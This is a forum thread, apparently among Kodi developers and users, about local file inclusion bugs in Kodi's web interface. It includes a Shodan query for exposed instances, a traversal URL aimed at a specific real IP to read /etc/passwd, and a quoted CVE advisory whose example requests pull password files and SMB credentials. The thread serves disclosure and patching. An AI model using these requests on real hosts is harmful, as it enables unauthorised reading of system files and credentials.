[un1versal]

@ natethomas

No at all, that's only one paragraph which looses context if not taken in consideration the whole post And the whole post is an observation and not any criticism personal or otherwise, if that's what you taken from it I must have not made it clear,

I agree that people should be informed and that was the point of why I wrote

Recently XBMC added a display screen on first run https://github.com/xbmc/xbmc/pull/1617 to tell users that there's a hidden menu. (a great usability idea) fantastic!
This would be great to use this idea to at least warn users they are using default or weak username and passwords on webserver and that its a security issue, if users still choose to ignore it, then at least no one can say team xbmc is not being responsible

Any 3rd party distros should equally demonstrate that warning users in similar fashion and should not wait for xbmc to do it anyway.

Again its not a criticism, just observation and suggestion.

I believe team xbmc developers do a fantastic job and xbmc is testament to their hard-work, commitment and ingenuity..

Cant explain what I meant to say better, English is not my first language.

Please dont be offended

uNi

[ChessSpider]

http://i.imgur.com/WbrWHBy.png

[ChessSpider]

FYI guys,

I did find some older articles addressing the same issue (e.g. http://forum.kodi.tv/showthread.php?tid=...id=1231710).. but that thread says it should be fixed?. This also is not "As of XBMC v12 Frodo, in an effort to make the Virtual File System service more secure (in Eden and before it allowed access to literally any file on the local hard disc and on network shares accessible to Kodi) the access has been limited to files within directories that have been specified by the user as sources (video, music, files, programs) in Kodi. " (http://kodi.wiki/view/Webserver) as I'm running v15 ...

Please be aware, there are still plenty of users who appear to run the Kodi-interface publicly.

This shodan query https://www.shodan.io/search?query=title%3Akodi found 5,184 results.

Not all of them may be vulnerable, but some are: http://178.85.220.75//%2f..%2f..%2f..%2f...c%2fpasswd

(I also found users running kodi as root, meaning even /etc/shadow could be read!)

Is this issue confirmed? Fixed?

[ronie]

edit: threads merged.

i've tested with current master and can confirm.

[ChessSpider]

Ok

Friend of mine found original fix: https://github.com/xbmc/xbmc/commit/bdff...ab52a65335

and this commit which may have reintroduced the issue (untested): https://github.com/xbmc/xbmc/commit/1291...f9e60bee66

[Memphiz]

Good catch - seems the fix is missing in the newly introduced ResolveAddon method.

[Memphiz]

@ChessSpider please give this a shot if you don't mind:

https://github.com/xbmc/xbmc/pull/8446

[ChessSpider]

Good that it has been looked at so quickly

How does Kodi usually deal with security issues? Is there some kind of credits in the release note. And will you release a new kodi v15 with this fixed?

Thanks,

[Memphiz]

can you confirm the fix? there is nothing like credits but what we have on github (you are explicitely mentioned in that pull request). 15.x is closed and there won't be any other 15.x release.

[ChessSpider]

I don't really have the set-up now to test this easily.

What I did was running nikto on the webserver (But you can also just copy/paste it and test it yourself)


Please let me know if its required for me to set something up.

[Memphiz]

Nahh i already verified and just wanted a second "ack" . As the maintainer also gave his OK already the fix will be active in next nightly build.

[ChessSpider]

FYI, Another LFI-problem was posted on the full disclosure security list by Eric Flokstra a few days ago

Original report:

# Exploit Title: Kodi - Local File Inclusion
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
# CVE: CVE-2017-5982

Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.

The web interface loads a thumbnail of an image, video or add-on when
selecting a category in the left menu with the following request:

http://192.168.1.25:8080/image/image%3A%...con.png%2F

Insufficient validation of user input is performed on this URL resulting
in a local file inclusion vulnerability. This enables attackers
to retrieve arbitrary files from the filesystem by changing the location
after the '/image/image%3A%2F%2F’ part.

<--Examples-->

1) If Kodi is connected to a NAS the following request can be used to
obtain plain-text SMB credentials:

http://192.168.1.25:8080/image/image%3A%...swords.xml

Response:

<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
pathversion="1">smb://username:[email protected]//share</to></path></passwords>

2) Request to retrieve the content of /etc/passwd:

http://192.168.1.25:8080/image/image%3A%...252fpasswd

Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3ys:/dev:/usr/sbin/nologin
sync:x:4:65534ync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...


--
---------------------------------------------------------------------
PGP Key ID = 0x6D336541EAB627EE
Fingerprint = DFBB E38E D848 4658 EC4C D161 6D33 6541 EAB6 27EE
https://pgp.mit.edu/pks/lookup?search=er...m&op=index
---------------------------------------------------------------------


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[Martijn]

So what else is new?

[ChessSpider]

So what else is new?

ikr, another year another lfi for kodi

[Martijn]

Here's the code
https://github.com/xbmc/xbmc


Patches welcome